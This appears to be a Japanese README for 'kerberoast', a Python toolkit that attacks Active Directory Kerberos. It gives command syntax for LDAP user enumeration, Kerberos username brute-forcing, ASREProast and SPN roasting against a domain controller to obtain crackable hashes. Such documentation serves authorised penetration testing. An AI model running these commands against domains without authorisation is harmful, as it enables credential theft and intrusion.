
このプロジェクトが気に入ったら、GitHubでスポンサーになることを検討してください! スポンサーになる
Kerberos攻撃ツールキット -純Python-

pip3 install kerberoast
Python 3.6 requirements.txtを参照
重要:LDAPおよびKerberosで受け入れられるターゲットURLの形式は以下の通りです
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
手順 -SSPI使用時-:
kerberoast auto <DC_ip>
手順 -SSPI未使用-:
kerberoast ldap all <ldap_connection_url> -o ldapenumldapenum_asrep_users.txt ファイル内のユーザーに対してASREP roastを実行するkerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txtldapenum_spn_users.txt ファイル内のユーザーに対してSPN roastを実行するkerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txtこのコマンドグループは、LDAP経由で潜在的に脆弱なユーザーを列挙するためのものです。
kerberoast ldap <type> <ldap_connection_url> <options>
Type: 列挙するユーザーには3つのタイプがあります
spn servicePrincipalName属性が設定されているユーザーを列挙します。asrep UAC属性にDONT_REQ_PREAUTHフラグが設定されているユーザーを列挙します。all 上記の全ての列挙を実行します。ldap_connection_url: msldap URL形式でユーザー資格情報とターゲットサーバーを指定します(ヘルプ参照)
options:
-o: 出力ファイルのベース名
このコマンドは、Kerberosサービスに対して可能なユーザー名候補をブルートフォースすることでユーザー名列挙を実行するためのものです。
kerberoast brute <realm> <dc_ip> <targets> <options>
realm: Kerberosレルム。通常はCOMPANY.corpのようになります。
dc_ip: ドメインコントローラのIPまたはホスト名
targets: 可能なユーザー名候補を含むファイルへのパス
options:
-o: 出力ファイルのベース名
このコマンドは、ASREProast攻撃を実行するためのものです。
kerberoast asreproast <dc_ip> <options>
dc_ip: ドメインコントローラのIPまたはホスト名
options:
-r: 使用するKerberosレルムを指定します。他のすべてのレルム情報を上書きします。
-o: 出力ファイルのベース名
-t: 攻撃を実行するユーザー名を含むファイルへのパス
-u: 攻撃を実行するユーザーを指定します。形式は<username>または<username>@<realm>ですが、前者の場合は-rオプションを使用してレルムを指定する必要があります。
このコマンドは、SPNroast(別名kerberoast)攻撃を実行するためのものです。
kerberoast spnroast <kerberos_connection_url> <options>
kerberos_connection_url: Kerberos URL形式でユーザー資格情報とターゲットサーバーを指定します(ヘルプ参照)
options:
-r: 使用するKerberosレルムを指定します。他のすべてのレルム情報を上書きします。
-o: 出力ファイルのベース名
-t: 攻撃を実行するユーザー名を含むファイルへのパス
-u: 攻撃を実行するユーザーを指定します。形式は<username>または<username>@<realm>ですが、前者の場合は-rオプションを使用してレルムを指定する必要があります。